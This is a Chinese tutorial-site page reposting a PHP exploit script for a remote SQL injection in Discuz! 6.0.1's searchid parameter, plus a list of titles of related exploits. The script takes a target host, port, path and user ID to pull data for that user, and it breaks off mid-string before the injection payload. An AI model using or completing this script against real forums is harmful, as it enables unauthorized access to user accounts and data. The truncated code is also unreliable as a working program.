手机
当前位置:查字典教程网 >网络安全 >Exploit >Discuz! 6.0.1 (searchid) Remote SQL Injection Exploit
Discuz! 6.0.1 (searchid) Remote SQL Injection Exploit
摘要:

<?php

error_reporting(E_ALL&E_NOTICE);

print_r("

------------------------------------------------------------------

Exploit discuz6.0.1

Just work as php>=5 & mysql>=4.1

BY james

------------------------------------------------------------------

");

if($argc>4)

{

$host=$argv[1];

$port=$argv[2];

$path=$argv[3];

$uid=$argv[4];

}else{

echo "Usage: php ".$argv[0]." host port path uidn";

echo "host: target server n";

echo "port: the web port, usually 80n";

echo "path: path to discuzn";

echo "uid : user ID you wanna getn";

echo "Example:rn";

echo "php ".$argv[0]." localhost 80 1n";

exit;

}

$content ="action=search&searchid=22

【Discuz! 6.0.1 (searchid) Remote SQL Injection Exploit】相关文章:

BIND 9.x Remote DNS Cache Poisoning Flaw Exploit (spoof on ircd)

Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BOF Exploit

pLink 2.07 (linkto.php id) Remote Blind SQL Injection Exploit

HockeySTATS Online 2.0 Multiple Remote SQL Injection Vulnerabilities

pSys 0.7.0 Alpha Multiple Remote File Inclusion Vulnerability

Rianxosencabos CMS 0.9 Remote Add Admin Exploit

Boonex Dolphin 6.1.2 Multiple Remote File Inclusion Vulnerabilities

Avlc Forum (vlc_forum.php id) Remote SQL Injection Vulnerability

Dana IRC 1.4a Remote Buffer Overflow Exploit

Wordpress Plugin Download Manager 0.2 Arbitrary File Upload Exploit

精品推荐
分类导航